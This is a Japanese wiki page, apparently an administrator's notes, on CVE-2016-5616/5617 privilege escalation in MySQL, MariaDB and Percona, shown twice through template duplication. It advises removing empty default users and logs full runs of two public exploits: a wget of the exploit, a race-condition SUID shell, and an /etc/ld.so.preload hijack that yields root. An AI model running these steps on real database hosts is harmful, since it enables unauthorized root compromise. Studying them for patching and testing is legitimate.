CVE/2016-5616
をテンプレートにして作成
[
トップ
] [
タイトル一覧
|
ページ一覧
|
新規
|
検索
|
最終更新
|
ヘルプ
|
ログイン
]
開始行:
** CVE-2016-5616, 5617 [#u7059892]
*** [[MySQL]], [[MariaDB]], [[Percona]] [#t6c6abf6]
- 該当マシンにアカウントがあり,データベースのアクセス(...
- MySQL の初期ユーザ等が残っている場合は特に危険.
- [[CVE-2016-5616>http://www.cve.mitre.org/cgi-bin/cvenam...
- [[CVE-2016-5617>http://www.cve.mitre.org/cgi-bin/cvenam...
- http://legalhackers.com/advisories/MySQL-Maria-Percona-...
- http://legalhackers.com/advisories/MySQL-Maria-Percona-...
**** デフォルトユーザ [#c3c58224]
- パスワードなし,ユーザ名なしのデータはインストール時に...
MariaDB [(none)]> use mysql;
MariaDB [mysql]> select Host,User,Password from user;
+-----------+------+------------------------------------...
| Host | User | Password ...
+-----------+------+------------------------------------...
| localhost | root | *1B1F13007F2FA68140D751B563EB49E018...
| rigel-b | root | ...
| 127.0.0.1 | root | ...
| ::1 | root | ...
| localhost | | ...
| rigel-b | | ...
+-----------+------+------------------------------------...
- 以下のコマンドで削除しておく
MariaDB [(none)]> use mysql;
MariaDB [mysql]> delete from user where user='';
MariaDB [mysql]> delete from user where password='';
**** mysql ユーザアカウントのダッシュ [#z9d7510f]
- Exploit code : [[mysql-privesc-race.c>ftp://www.nsl.tui...
$ wget ftp://www.nsl.tuis.ac.jp/pub/mariadb/Vulnerabilit...
$ gcc -o mysql-privesc-race mysql-privesc-race.c -I/usr/...
[iseki@rigel-b ~]:439$ ./mysql-privesc-race '' '' localh...
MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Co...
mysql-privesc-race.c (ver. 1.0)
CVE-2016-6663 / CVE-2016-5616
For testing purposes only. Do no harm.
Discovered/Coded by:
Dawid Golunski
http://legalhackers.com
[+] Starting the exploit as:
uid=502(iseki) gid=100(users) 所属グループ=100(users)
[+] Connecting to the database `test` as @localhost
[+] Creating exploit temp directory /tmp/mysql_privesc_e...
[+] Creating mysql tables
DROP TABLE IF EXISTS exploit_table
DROP TABLE IF EXISTS mysql_suid_shell
CREATE TABLE exploit_table (txt varchar(50)) engine = 'M...
CREATE TABLE mysql_suid_shell (txt varchar(50)) engine =...
[+] Copying bash into the mysql_suid_shell table.
After the exploitation the following file/table will ...
-rw-rw---- 1 mysql users 941880 11月 11 09:37 2016 /tmp/...
[+] Entering the race loop... Hang in there...
->->->->->->->->->->->->->->->->->->->->->->->->->->->->...
[+] Bingo! Race won (took 12874 tries) ! Check out the m...
-rwsrwxrwx 1 mysql users 941880 11月 11 09:37 2016 /tmp/...
[+] Spawning the mysql SUID shell now...
Remember that from there you can gain root with vuln ...
mysql_suid_shell.MYD-4.1$ whoami
mysql
**** mysql アカウントからの root アカウントのダッシュ [#l...
- Exploit code : [[mysql-chowned.sh>http://www.nsl.tuis....
mysql_suid_shell.MYD-4.1$ ./mysql-chowned.sh /var/mysql/...
MySQL / MariaDB / Percona - Root Privilege Escalation Po...
mysql-chowned.sh (ver. 1.0)
CVE-2016-6664 / CVE-2016-5617
Discovered and coded by:
Dawid Golunski
http://legalhackers.com
[+] Starting the exploit as
uid=502(iseki) gid=100(users) euid=103(mysql) 所属グルー...
[+] Target MySQL log file set to /var/mysql/rigel-b.err
[+] Compiling the privesc shared library (/tmp/privescli...
[+] Backdoor/low-priv shell installed at:
-rwxr-xr-x 1 mysql users 941880 11月 11 09:52 2016 /tmp/...
[+] Symlink created at:
lrwxrwxrwx 1 mysql users 18 11月 11 09:52 2016 /var/mysq...
[+] Waiting for MySQL to re-open the logs/MySQL service ...
[+] Waiting for MySQL to re-open the logs/MySQL service ...
./mysql-chowned.sh: line 153: pidof: コマンドが見つかり...
Do you want to kill mysqld process to instantly get roo...
Got it. Executing 'killall mysqld' now...
[+] MySQL restarted. The /etc/ld.so.preload file got cre...
-rw-r----- 1 mysql root 19 11月 11 09:52 2016 /etc/ld.so...
[+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.p...
[+] The /etc/ld.so.preload file now contains:
/tmp/privesclib.so
[+] Escalating privileges via the /usr/bin/sudo SUID bin...
-rwsrwxrwx 1 root root 941880 11月 11 09:52 2016 /tmp/my...
[+] Rootshell got assigned root SUID perms at:
-rwsrwxrwx 1 root root 941880 11月 11 09:52 2016 /tmp/my...
Got root! The database server has been ch-OWNED !
[+] Spawning the rootshell /tmp/mysqlrootsh now!
mysqlrootsh-4.1# whoami
root
終了行:
** CVE-2016-5616, 5617 [#u7059892]
*** [[MySQL]], [[MariaDB]], [[Percona]] [#t6c6abf6]
- 該当マシンにアカウントがあり,データベースのアクセス(...
- MySQL の初期ユーザ等が残っている場合は特に危険.
- [[CVE-2016-5616>http://www.cve.mitre.org/cgi-bin/cvenam...
- [[CVE-2016-5617>http://www.cve.mitre.org/cgi-bin/cvenam...
- http://legalhackers.com/advisories/MySQL-Maria-Percona-...
- http://legalhackers.com/advisories/MySQL-Maria-Percona-...
**** デフォルトユーザ [#c3c58224]
- パスワードなし,ユーザ名なしのデータはインストール時に...
MariaDB [(none)]> use mysql;
MariaDB [mysql]> select Host,User,Password from user;
+-----------+------+------------------------------------...
| Host | User | Password ...
+-----------+------+------------------------------------...
| localhost | root | *1B1F13007F2FA68140D751B563EB49E018...
| rigel-b | root | ...
| 127.0.0.1 | root | ...
| ::1 | root | ...
| localhost | | ...
| rigel-b | | ...
+-----------+------+------------------------------------...
- 以下のコマンドで削除しておく
MariaDB [(none)]> use mysql;
MariaDB [mysql]> delete from user where user='';
MariaDB [mysql]> delete from user where password='';
**** mysql ユーザアカウントのダッシュ [#z9d7510f]
- Exploit code : [[mysql-privesc-race.c>ftp://www.nsl.tui...
$ wget ftp://www.nsl.tuis.ac.jp/pub/mariadb/Vulnerabilit...
$ gcc -o mysql-privesc-race mysql-privesc-race.c -I/usr/...
[iseki@rigel-b ~]:439$ ./mysql-privesc-race '' '' localh...
MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Co...
mysql-privesc-race.c (ver. 1.0)
CVE-2016-6663 / CVE-2016-5616
For testing purposes only. Do no harm.
Discovered/Coded by:
Dawid Golunski
http://legalhackers.com
[+] Starting the exploit as:
uid=502(iseki) gid=100(users) 所属グループ=100(users)
[+] Connecting to the database `test` as @localhost
[+] Creating exploit temp directory /tmp/mysql_privesc_e...
[+] Creating mysql tables
DROP TABLE IF EXISTS exploit_table
DROP TABLE IF EXISTS mysql_suid_shell
CREATE TABLE exploit_table (txt varchar(50)) engine = 'M...
CREATE TABLE mysql_suid_shell (txt varchar(50)) engine =...
[+] Copying bash into the mysql_suid_shell table.
After the exploitation the following file/table will ...
-rw-rw---- 1 mysql users 941880 11月 11 09:37 2016 /tmp/...
[+] Entering the race loop... Hang in there...
->->->->->->->->->->->->->->->->->->->->->->->->->->->->...
[+] Bingo! Race won (took 12874 tries) ! Check out the m...
-rwsrwxrwx 1 mysql users 941880 11月 11 09:37 2016 /tmp/...
[+] Spawning the mysql SUID shell now...
Remember that from there you can gain root with vuln ...
mysql_suid_shell.MYD-4.1$ whoami
mysql
**** mysql アカウントからの root アカウントのダッシュ [#l...
- Exploit code : [[mysql-chowned.sh>http://www.nsl.tuis....
mysql_suid_shell.MYD-4.1$ ./mysql-chowned.sh /var/mysql/...
MySQL / MariaDB / Percona - Root Privilege Escalation Po...
mysql-chowned.sh (ver. 1.0)
CVE-2016-6664 / CVE-2016-5617
Discovered and coded by:
Dawid Golunski
http://legalhackers.com
[+] Starting the exploit as
uid=502(iseki) gid=100(users) euid=103(mysql) 所属グルー...
[+] Target MySQL log file set to /var/mysql/rigel-b.err
[+] Compiling the privesc shared library (/tmp/privescli...
[+] Backdoor/low-priv shell installed at:
-rwxr-xr-x 1 mysql users 941880 11月 11 09:52 2016 /tmp/...
[+] Symlink created at:
lrwxrwxrwx 1 mysql users 18 11月 11 09:52 2016 /var/mysq...
[+] Waiting for MySQL to re-open the logs/MySQL service ...
[+] Waiting for MySQL to re-open the logs/MySQL service ...
./mysql-chowned.sh: line 153: pidof: コマンドが見つかり...
Do you want to kill mysqld process to instantly get roo...
Got it. Executing 'killall mysqld' now...
[+] MySQL restarted. The /etc/ld.so.preload file got cre...
-rw-r----- 1 mysql root 19 11月 11 09:52 2016 /etc/ld.so...
[+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.p...
[+] The /etc/ld.so.preload file now contains:
/tmp/privesclib.so
[+] Escalating privileges via the /usr/bin/sudo SUID bin...
-rwsrwxrwx 1 root root 941880 11月 11 09:52 2016 /tmp/my...
[+] Rootshell got assigned root SUID perms at:
-rwsrwxrwx 1 root root 941880 11月 11 09:52 2016 /tmp/my...
Got root! The database server has been ch-OWNED !
[+] Spawning the rootshell /tmp/mysqlrootsh now!
mysqlrootsh-4.1# whoami
root
ページ名:
![[PukiWiki]](image/pukiwiki.png "[PukiWiki]")
